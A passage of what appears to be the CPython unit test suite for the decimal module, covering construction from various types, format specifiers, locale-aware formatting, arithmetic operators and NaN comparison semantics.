Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
